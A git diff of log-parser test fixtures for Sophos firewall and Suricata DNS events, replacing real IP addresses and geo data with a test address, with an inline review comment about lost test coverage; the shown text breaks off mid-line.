device_name=\"XG230\" device_id=1234567890123457 log_id=020804407002 log_type=\"IDP\" log_component=\"Signatures\" log_subtype=\"Drop\" priority=Warning idp_policy_id=7 fw_rule_id=25 user_name=\"\" signature_id=53589 signature_msg=\"SERVER-WEBAPP DrayTek multiple products command injection attempt\" classification=\"Web Application Attack\" rule_priority=2 src_ip=175.16.199.1 src_country_code=NLD dst_ip=175.16.199.1 dst_country_code=R1 protocol=\"TCP\" src_port=59476 dst_port=80 platform=\"Linux,Mac,Other,Unix,Windows\" category=\"server-webapp\" target=\"Server\"", "code": "020804407002", "kind": "alert", "action": "drop", 
@@ -7665,7 +7990,7 @@ }, "event": { "severity": 4, - "ingested": "2021-06-30T11:19:55.566541200Z", + "ingested": "2021-12-09T13:44:55.715625100Z", "original": "device=\"SFW\" date=2018-05-23 time=16:20:34 timezone=\"BST\" device_name=\"XG750\" device_id=SFDemo-f64dd6be log_id=020703406001 log_type=\"IDP\" log_component=\"Anomaly\" log_subtype=\"Detect\" priority=Warning idp_policy_id=1 fw_rule_id=2 user_name=\"\" signature_id=26022 signature_msg=\"FILE-PDF EmbeddedFile contained within a PDF\" classification=\"A Network Trojan was detected\" rule_priority=1 src_ip=10.0.0.168 src_country_code=R1 dst_ip=10.1.1.234 dst_country_code=R1 protocol=\"TCP\" src_port=28938 dst_port=25 platform=\"Windows\" category=\"Malware Communication\" target=\"Server\"", "code": "020703406001", "kind": "alert", @@ -7755,7 +8080,7 @@ }, "event": { "severity": 4, - "ingested": "2021-06-30T11:19:55.566546300Z", + "ingested": "2021-12-09T13:44:55.715631100Z", "original": "device=\"SFW\" date=2018-05-23 time=16:16:43 timezone=\"BST\" device_name=\"XG750\" device_id=SFDemo-f64dd6be log_id=020704406002 log_type=\"IDP\" log_component=\"Anomaly\" log_subtype=\"Drop\" priority=Warning idp_policy_id=1 fw_rule_id=2 user_name=\"\" signature_id=26022 signature_msg=\"FILE-PDF EmbeddedFile contained within a PDF\" classification=\"A Network Trojan was detected\" rule_priority=1 src_ip=10.0.1.31 src_country_code=R1 dst_ip=10.1.0.115 dst_country_code=R1 protocol=\"TCP\" src_port=40140 dst_port=25 platform=\"Windows\" category=\"Malware Communication\" target=\"Server\"", "code": "020704406002", "kind": "alert", 
@@ -7813,7 +8138,7 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566552500Z", + "ingested": "2021-12-09T13:44:55.715637200Z", "original": "device=\"SFW\" date=2017-01-31 time=14:52:11 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44310050024-P29PUA log_id=138301618041 log_type=\"Sandbox\" log_component=\"Mail\" log_subtype=\"Allowed\" priority=Information user_name=\"\" src_ip= filename=\"\" filetype=\"\" filesize=0 sha1sum=\"\" source=\"\" reason=\"eligible\" destination=\"\" subject=\"\"", "code": "138301618041", "kind": "event", @@ -7895,7 +8220,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-30T11:19:55.566556300Z", + "ingested": "2021-12-09T13:44:55.715643Z", "original": "device=\"SFW\" date=2017-01-31 time=14:52:11 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44310050024-P29PUA log_id=138302218042 log_type=\"Sandbox\" log_component=\"Mail\" log_subtype=\"Denied\" priority=Critical user_name=\"jsmith@iview.com\" src_ip=10.198.47.112 filename=\"1.exe\" filetype=\"application/octet-stream\" filesize=153006 sha1sum=\"83cd339302bf5e8ed5240ca6383418089c337a81\" source=\"jsmith@iview.com\" reason=\"cached malicious\" destination=\"\" subject=\"\"", "code": "138302218042", "kind": "alert", @@ -7953,7 +8278,7 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566561500Z", + "ingested": "2021-12-09T13:44:55.715648800Z", "original": "device=\"SFW\" date=2017-01-31 time=15:28:25 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44313350024-P29PUA log_id=136501618041 log_type=\"Sandbox\" log_component=\"Web\" log_subtype=\"Allowed\" priority=Information user_name=\"\" src_ip= filename=\"\" filetype=\"\" filesize=0 sha1sum=\"\" source=\"\" reason=\"eligible\" destination=\"\" subject=\"\"", "code": "136501618041", "kind": "event", 
@@ -8035,7 +8360,7 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566567Z", + "ingested": "2021-12-09T13:44:55.715729400Z", "original": "device=\"SFW\" date=2017-01-31 time=15:28:25 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44310050024-P29PUA log_id=136528618043 log_type=\"Sandbox\" log_component=\"Web\" log_subtype=\"Pending\" priority=Information user_name=\"jsmith\" src_ip=10.198.47.112 filename=\"19.exe\" filetype=\"application/octet-stream\" filesize=153010 sha1sum=\"3ce799580908df9ca0dc649aa8c2d06ab267e8c8\" source=\"10.198.241.50\" reason=\"pending\" destination=\"\" subject=\"\"", "code": "136528618043", "kind": "event", @@ -8116,7 +8441,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-30T11:19:55.566570800Z", + "ingested": "2021-12-09T13:44:55.715736400Z", "original": "device=\"SFW\" date=2017-01-31 time=15:28:25 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44310050024-P29PUA log_id=136502218042 log_type=\"Sandbox\" log_component=\"Web\" log_subtype=\"Denied\" priority=Critical user_name=\"jsmith\" src_ip=10.198.47.112 filename=\"19.exe\" filetype=\"application/octet-stream\" filesize=153010 sha1sum=\"3ce799580908df9ca0dc649aa8c2d06ab267e8c8\" source=\"10.198.241.50\" reason=\"cloud malicious\" destination=\"\" subject=\"", "code": "136502218042", "kind": "alert", @@ -8137,7 +8462,7 @@ "level": "critical" }, "source": { - "ip": "172.16.34.24" + "ip": "175.16.199.1" }, "tags": [ "preserve_original_event" @@ -8167,7 +8492,7 @@ "d910c4a81122c360fe57f67a04999425a65249db" ], "ip": [ - "172.16.34.24" + "175.16.199.1" ] }, "sophos": { 
@@ -8188,12 +8513,12 @@ "name": "defaulttest.local" }, "client": { - "ip": "172.16.34.24" + "ip": "175.16.199.1" }, "event": { "severity": 2, - "ingested": "2021-06-30T11:19:55.566574700Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:36 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44310050024-P29PUA log_id=136502218042 log_type=\"Sandbox\" log_component=\"Web\" log_subtype=\"Denied\" priority=Critical user_name=\"\" src_ip=172.16.34.24 filename=\"SBTestFile1.pdf\" filetype=\"application/pdf\" filesize=1124 sha1sum=\"d910c4a81122c360fe57f67a04999425a65249db\" source=\"sophostest.com\" reason=\"cached malicious\" destination=\"\" subject=\"\"", + "ingested": "2021-12-09T13:44:55.715742800Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:36 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44310050024-P29PUA log_id=136502218042 log_type=\"Sandbox\" log_component=\"Web\" log_subtype=\"Denied\" priority=Critical user_name=\"\" src_ip=175.16.199.1 filename=\"SBTestFile1.pdf\" filetype=\"application/pdf\" filesize=1124 sha1sum=\"d910c4a81122c360fe57f67a04999425a65249db\" source=\"sophostest.com\" reason=\"cached malicious\" destination=\"\" subject=\"\"", "code": "136502218042", "kind": "alert", "action": "Denied", 
@@ -8211,54 +8536,52 @@ { "server": { "bytes": 5669, - "ip": "185.8.209.207" + "ip": "175.16.199.1" }, "log": { "level": "informational" }, "destination": { "geo": { - "continent_name": "Europe", - "region_iso_code": "CH-VD", - "city_name": "Saint-Prex", - "country_iso_code": "CH", - "country_name": "Switzerland", - "region_name": "Vaud", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 6.4599, - "lat": 46.4796 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 199567, + "number": 4837, "organization": { - "name": "Fr. Sauter AG" + "name": "CHINA UNICOM China169 Backbone" } }, "bytes": 401, - "ip": "185.8.209.207" + "ip": "175.16.199.1" }, "source": { "geo": { - "continent_name": "Europe", - "region_iso_code": "PL-22", - "city_name": "Gdynia", - "country_iso_code": "PL", - "country_name": "Poland", - "region_name": "Pomerania", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 18.5403, - "lat": 54.5055 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 6830, + "number": 4837, "organization": { - "name": "Liberty Global B.V." + "name": "CHINA UNICOM China169 Backbone" } }, "bytes": 1419, - "ip": "89.68.140.204" + "ip": "175.16.199.1" }, "url": { "full": "/mapi/nspi/" @@ -8281,8 +8604,7 @@ "testhost.local" ], "ip": [ - "89.68.140.204", - "185.8.209.207" + "175.16.199.1" ] }, "sophos": { 
@@ -8293,7 +8615,7 @@ "log_type": "WAF", "log_component": "Web Application Firewall", "cookie": "MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsxYNAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDoAitM4bv3XCA==;MapiSequence=10-GtgsIA==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7PxcrL", - "host": "89.68.140.204", + "host": "175.16.199.1", "responsetime": 11199, "querystring": "?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com", "message_id": "17071", @@ -8306,7 +8628,7 @@ }, "client": { "bytes": 1419, - "ip": "89.68.140.204" + "ip": "175.16.199.1" }, "http": { "request": { 
@@ -8316,8 +8638,8 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566578200Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:46 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=075000617071 log_type=\"WAF\" log_component=\"Web Application Firewall\" priority=Information user_name=\"-\" server=webmail.elasticuser.com sourceip=89.68.140.204 localip=185.8.209.207 ws_protocol=\"HTTP/1.1\" url=/mapi/nspi/ querystring=?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com cookie=\"MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsxYNAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDoAitM4bv3XCA==;MapiSequence=10-GtgsIA==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7PxcrL\" referer=- method=POST httpstatus=401 reason=\"-\" extra=\"-\" contenttype=\"-\" useragent=\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.4954; Pro)\" host=89.68.140.204 responsetime=11199 bytessent=5669 bytesrcv=1419 fw_rule_id=79", + "ingested": "2021-12-09T13:44:55.715749Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:46 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=075000617071 log_type=\"WAF\" log_component=\"Web Application Firewall\" priority=Information user_name=\"-\" server=webmail.elasticuser.com sourceip=175.16.199.1 localip=175.16.199.1 ws_protocol=\"HTTP/1.1\" url=/mapi/nspi/ querystring=?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com cookie=\"MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsxYNAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDoAitM4bv3XCA==;MapiSequence=10-GtgsIA==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7PxcrL\" referer=- method=POST httpstatus=401 reason=\"-\" 
extra=\"-\" contenttype=\"-\" useragent=\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.4954; Pro)\" host=175.16.199.1 responsetime=11199 bytessent=5669 bytesrcv=1419 fw_rule_id=79", "code": "075000617071", "kind": "alert", "action": "denied", @@ -8337,54 +8659,52 @@ { "server": { "bytes": 1357, - "ip": "185.8.209.207" + "ip": "175.16.199.1" }, "log": { "level": "informational" }, "destination": { "geo": { - "continent_name": "Europe", - "region_iso_code": "CH-VD", - "city_name": "Saint-Prex", - "country_iso_code": "CH", - "country_name": "Switzerland", - "region_name": "Vaud", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 6.4599, - "lat": 46.4796 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 199567, + "number": 4837, "organization": { - "name": "Fr. Sauter AG" + "name": "CHINA UNICOM China169 Backbone" } }, "bytes": 200, - "ip": "185.8.209.207" + "ip": "175.16.199.1" }, "source": { "geo": { - "continent_name": "Europe", - "region_iso_code": "PL-22", - "city_name": "Gdynia", - "country_iso_code": "PL", - "country_name": "Poland", - "region_name": "Pomerania", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 18.5403, - "lat": 54.5055 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 6830, + "number": 4837, "organization": { - "name": "Liberty Global B.V." + "name": "CHINA UNICOM China169 Backbone" } }, "bytes": 1774, - "ip": "89.68.140.204" + "ip": "175.16.199.1" }, "url": { "full": "/mapi/nspi/" @@ -8407,8 +8727,7 @@ "defaulttest.local" ], "ip": [ - "89.68.140.204", - "185.8.209.207" + "175.16.199.1" ] }, "sophos": { 
@@ -8423,7 +8742,7 @@ "contenttype": "application/mapi-http", "device_name": "XG230", "log_type": "WAF", - "host": "89.68.140.204", + "host": "175.16.199.1", "responsetime": 14086, "device": "SFW" } @@ -8433,7 +8752,7 @@ }, "client": { "bytes": 1774, - "ip": "89.68.140.204" + "ip": "175.16.199.1" }, "http": { "request": { 
@@ -8443,8 +8762,8 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566583300Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:47 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=075000617071 log_type=\"WAF\" log_component=\"Web Application Firewall\" priority=Information user_name=\"-\" server=webmail.elasticuser.com sourceip=89.68.140.204 localip=185.8.209.207 ws_protocol=\"HTTP/1.1\" url=/mapi/nspi/ querystring=?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com cookie=\"MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsw0NAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDpeyft5bv3XCA==;MapiSequence=9-Km2JMg==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7Oxc3M\" referer=- method=POST httpstatus=200 reason=\"-\" extra=\"-\" contenttype=\"application/mapi-http\" useragent=\"Microsoft Office/16.0 (Windows NT 6.2; Microsoft Outlook 16.0.4954; Pro)\" host=89.68.140.204 responsetime=14086 bytessent=1357 bytesrcv=1774 fw_rule_id=79", + "ingested": "2021-12-09T13:44:55.715753100Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:47 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=075000617071 log_type=\"WAF\" log_component=\"Web Application Firewall\" priority=Information user_name=\"-\" server=webmail.elasticuser.com sourceip=175.16.199.1 localip=175.16.199.1 ws_protocol=\"HTTP/1.1\" url=/mapi/nspi/ querystring=?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com cookie=\"MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsw0NAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDpeyft5bv3XCA==;MapiSequence=9-Km2JMg==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7Oxc3M\" referer=- method=POST 
httpstatus=200 reason=\"-\" extra=\"-\" contenttype=\"application/mapi-http\" useragent=\"Microsoft Office/16.0 (Windows NT 6.2; Microsoft Outlook 16.0.4954; Pro)\" host=175.16.199.1 responsetime=14086 bytessent=1357 bytesrcv=1774 fw_rule_id=79", "code": "075000617071", "kind": "alert", "action": "denied", @@ -8540,7 +8859,7 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566588500Z", + "ingested": "2021-12-09T13:44:55.715757900Z", "original": "device=\"SFW\" date=2020-05-19 time=17:20:29 timezone=\"IST\" device_name=\"XG230\" device_id=1234567890123457 log_id=075000617071 log_type=\"WAF\" log_component=\"Web Application Firewall\" priority=Information user_name=\"jsmith\" server=www.iviewtest.com:8989 sourceip=10.198.235.254 localip=10.198.233.48 ws_protocol=\"HTTP/1.1\" url=/ querystring= cookie=\"-\" referer=- method=GET httpstatus=403 reason=\"Static URL Hardening\" extra=\"No signature found\" contenttype=\"text/html\" useragent=\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0\" host=10.198.235.254 responsetime=19310 bytessent=726 bytesrcv=510 fw_rule_id=3", "code": "075000617071", "kind": "alert", 
@@ -8640,7 +8959,7 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566594800Z", + "ingested": "2021-12-09T13:44:55.715763800Z", "original": "device=\"SFW\" date=2020-05-19 time=18:03:30 timezone=\"IST\" device_name=\"XG230\" device_id=1234567890123456 log_id=075000617071 log_type=\"WAF\" log_component=\"Web Application Firewall\" priority=Information user_name=\"jsmith\" server=www.iviewtest.com:8990 sourceip=10.198.235.254 localip=10.198.233.48 ws_protocol=\"HTTP/1.1\" url=/download/eicarcom2.zip querystring= cookie=\"; PHPSESSID=jetkd9iadd969hsr77jpj4q974; _pk_id.1.fc3a=3a6250e215194a92.1485866024.1.1485866069.1485866024.; _pk_ses.1.fc3a=*\" referer=http://www.iviewtest.com:8990/85-0-Download.html method=GET httpstatus=403 reason=\"Antivirus\" extra=\"EICAR-AV-Test\" contenttype=\"text/html\" useragent=\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0\" host=10.198.235.254 responsetime=403214 bytessent=739 bytesrcv=715 fw_rule_id=6", "code": "075000617071", "kind": "alert", 
@@ -8662,51 +8981,52 @@ { "server": { "bytes": 5353, - "ip": "216.167.51.72" + "ip": "175.16.199.1" }, "log": { "level": "informational" }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "US" + "country_iso_code": "CN" }, "as": { - "number": 2914, + "number": 4837, "organization": { - "name": "NTT America, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "bytes": 403, - "ip": "216.167.51.72" + "ip": "175.16.199.1" }, "source": { "geo": { - "continent_name": "Europe", - "region_iso_code": "RO-B", - "city_name": "Bucharest", - "country_iso_code": "RO", - "country_name": "Romania", - "region_name": "Bucuresti", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 26.1708, - "lat": 44.4176 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 9009, + "number": 4837, "organization": { - "name": "M247 Ltd" + "name": "CHINA UNICOM China169 Backbone" } }, "bytes": 295, - "ip": "83.97.20.30" + "ip": "175.16.199.1" }, "url": { "full": "/" @@ -8729,8 +9049,7 @@ "defaulttest.local" ], "ip": [ - "83.97.20.30", - "216.167.51.72" + "175.16.199.1" ] }, "sophos": { @@ -8741,7 +9060,7 @@ "log_type": "WAF", "log_component": "Web Application Firewall", "extra": "Inbound Anomaly Score Exceeded (Total Score: 7, SQLi=, XSS=): Last Matched Message: Request Missing a User Agent Header", - "host": "83.97.20.30", + "host": "175.16.199.1", "responsetime": 608, "message_id": "17071", "priority": "Information", @@ -8754,7 +9073,7 @@ }, "client": { "bytes": 295, - "ip": "83.97.20.30" + "ip": "175.16.199.1" }, "http": { "request": { 
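Review bot: In the `@@ -8662,51 +8981,52 @@` hunk the rewritten fixture assigns `175.16.199.1` to `server.ip`, `destination.ip`, `source.ip` and `client.ip` alike, so the expected `related.ip` array collapses from two entries to one and this test case no longer verifies that a WAF event whose `sourceip` and `localip` differ gets geo/AS enrichment on both sides. Since the change only needs addresses the bundled test GeoIP database knows, keeping two distinct addresses from that supported subset for `sourceip` and `localip` would preserve the coverage the old fixture had, with `"ip": [` listing both in `related.ip`. The matching `event.original` line for this event is in the later `@@ -8764,8 +9083,8 @@` hunk of this file, where `sourceip=175.16.199.1 localip=175.16.199.1` would need the same adjustment.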
@@ -8764,8 +9083,8 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566602100Z", - "original": "device=\"SFW\" date=2020-05-20 time=18:03:31 timezone=\"IST\" device_name=\"XG230\" device_id=1234567890123457 log_id=075000617071 log_type=\"WAF\" log_component=\"Web Application Firewall\" priority=Information user_name=\"-\" server=- sourceip=83.97.20.30 localip=216.167.51.72 ws_protocol=\"HTTP/1.0\" url=/ querystring=\"\" cookie=\"-\" referer=\"-\" method=GET httpstatus=403 reason=\"WAF Anomaly\" extra=\"Inbound Anomaly Score Exceeded (Total Score: 7, SQLi=, XSS=): Last Matched Message: Request Missing a User Agent Header\" contenttype=\"text/html\" useragent=\"-\" host=83.97.20.30 responsetime=608 bytessent=5353 bytesrcv=295 fw_rule_id=3", + "ingested": "2021-12-09T13:44:55.715769700Z", + "original": "device=\"SFW\" date=2020-05-20 time=18:03:31 timezone=\"IST\" device_name=\"XG230\" device_id=1234567890123457 log_id=075000617071 log_type=\"WAF\" log_component=\"Web Application Firewall\" priority=Information user_name=\"-\" server=- sourceip=175.16.199.1 localip=175.16.199.1 ws_protocol=\"HTTP/1.0\" url=/ querystring=\"\" cookie=\"-\" referer=\"-\" method=GET httpstatus=403 reason=\"WAF Anomaly\" extra=\"Inbound Anomaly Score Exceeded (Total Score: 7, SQLi=, XSS=): Last Matched Message: Request Missing a User Agent Header\" contenttype=\"text/html\" useragent=\"-\" host=175.16.199.1 responsetime=608 bytessent=5353 bytesrcv=295 fw_rule_id=3", "code": "075000617071", "kind": "alert", "action": "denied", 
@@ -8818,7 +9137,7 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566609400Z", + "ingested": "2021-12-09T13:44:55.715775600Z", "original": "device=\"SFW\" date=2017-02-01 time=14:17:35 timezone=\"IST\" device_name=\"SG115\" device_id=S110016E28BA631 log_id=106025618011 log_type=\"Wireless Protection\" log_component=\"Wireless Protection\" log_subtype=\"Information\" priority=Information ap=A40024A636F7862 ssid=SPIDIGO2015 clients_conn_ssid=2", "code": "106025618011", "kind": "event", @@ -8866,7 +9185,7 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566616600Z", + "ingested": "2021-12-09T13:44:55.715780600Z", "original": "device=\"SFW\" date=2017-02-01 time=14:19:47 timezone=\"IST\" device_name=\"SG115\" device_id=S110016E28BA631 log_id=106025618011 log_type=\"Wireless Protection\" log_component=\"Wireless Protection\" log_subtype=\"Information\" priority=Information ap=A40024A636F7862 ssid=SPIDIGO2015 clients_conn_ssid=3", "code": "106025618011", "kind": "event", diff --git a/packages/sophos/manifest.yml b/packages/sophos/manifest.yml index 3bd432f7cde..fe077a08a6c 100644 --- a/packages/sophos/manifest.yml +++ b/packages/sophos/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: sophos title: Sophos Logs -version: 1.1.0 +version: 1.1.1 description: Collect and parse logs from Sophos Products with Elastic Agent. categories: ["security"] release: ga diff --git a/packages/suricata/_dev/deploy/docker/sample_logs/eve-dns-4.1.4.ndjson b/packages/suricata/_dev/deploy/docker/sample_logs/eve-dns-4.1.4.ndjson index 4f625ae98f8..9f38719e12d 100644 --- a/packages/suricata/_dev/deploy/docker/sample_logs/eve-dns-4.1.4.ndjson +++ b/packages/suricata/_dev/deploy/docker/sample_logs/eve-dns-4.1.4.ndjson 
@@ -1,24 +1,24 @@
 {"timestamp":"2019-08-22T23:48:27.924120+0000","flow_id":885455453886936,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.15","src_port":46686,"dest_ip":"10.0.2.3","dest_port":53,"proto":"UDP","dns":{"type":"query","id":51803,"rrname":"google.com","rrtype":"A","tx_id":0}}
 {"timestamp":"2019-08-22T23:48:27.924282+0000","flow_id":1418448010418810,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.15","src_port":36993,"dest_ip":"10.0.2.3","dest_port":53,"proto":"UDP","dns":{"type":"query","id":39523,"rrname":"google.com","rrtype":"AAAA","tx_id":0}}
-{"timestamp":"2019-08-22T23:48:27.950946+0000","flow_id":1418448010418810,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":36993,"proto":"UDP","dns":{"version":2,"type":"answer","id":39523,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"google.com","rrtype":"AAAA","answers":[{"rrname":"google.com","rrtype":"AAAA","ttl":272,"rdata":"2607:f8b0:4006:0805:0000:0000:0000:200e"}],"grouped":{"AAAA":["2607:f8b0:4006:0805:0000:0000:0000:200e"]}}}
-{"timestamp":"2019-08-22T23:48:27.957906+0000","flow_id":885455453886936,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":46686,"proto":"UDP","dns":{"version":2,"type":"answer","id":51803,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"google.com","rrtype":"A","answers":[{"rrname":"google.com","rrtype":"A","ttl":299,"rdata":"172.217.11.46"}],"grouped":{"A":["172.217.11.46"]}}}
+{"timestamp":"2019-08-22T23:48:27.950946+0000","flow_id":1418448010418810,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":36993,"proto":"UDP","dns":{"version":2,"type":"answer","id":39523,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"google.com","rrtype":"AAAA","answers":[{"rrname":"google.com","rrtype":"AAAA","ttl":272,"rdata":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"}],"grouped":{"AAAA":["2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"]}}}
+{"timestamp":"2019-08-22T23:48:27.957906+0000","flow_id":885455453886936,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":46686,"proto":"UDP","dns":{"version":2,"type":"answer","id":51803,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"google.com","rrtype":"A","answers":[{"rrname":"google.com","rrtype":"A","ttl":299,"rdata":"175.16.199.1"}],"grouped":{"A":["175.16.199.1"]}}}
 {"timestamp":"2019-08-22T23:48:48.839495+0000","flow_id":40074894954311,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.15","src_port":50720,"dest_ip":"10.0.2.3","dest_port":53,"proto":"UDP","dns":{"type":"query","id":60273,"rrname":"www.elastic.co","rrtype":"A","tx_id":0}}
 {"timestamp":"2019-08-22T23:48:48.839714+0000","flow_id":2130691028471842,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.15","src_port":41979,"dest_ip":"10.0.2.3","dest_port":53,"proto":"UDP","dns":{"type":"query","id":4210,"rrname":"www.elastic.co","rrtype":"AAAA","tx_id":0}}
-{"timestamp":"2019-08-22T23:48:48.901548+0000","flow_id":40074894954311,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":50720,"proto":"UDP","dns":{"version":2,"type":"answer","id":60273,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"www.elastic.co","rrtype":"A","answers":[{"rrname":"www.elastic.co","rrtype":"CNAME","ttl":270,"rdata":"dualstack.r2.shared.global.fastly.net"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"151.101.130.217"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"151.101.194.217"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"151.101.2.217"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"151.101.66.217"}],"grouped":{"A"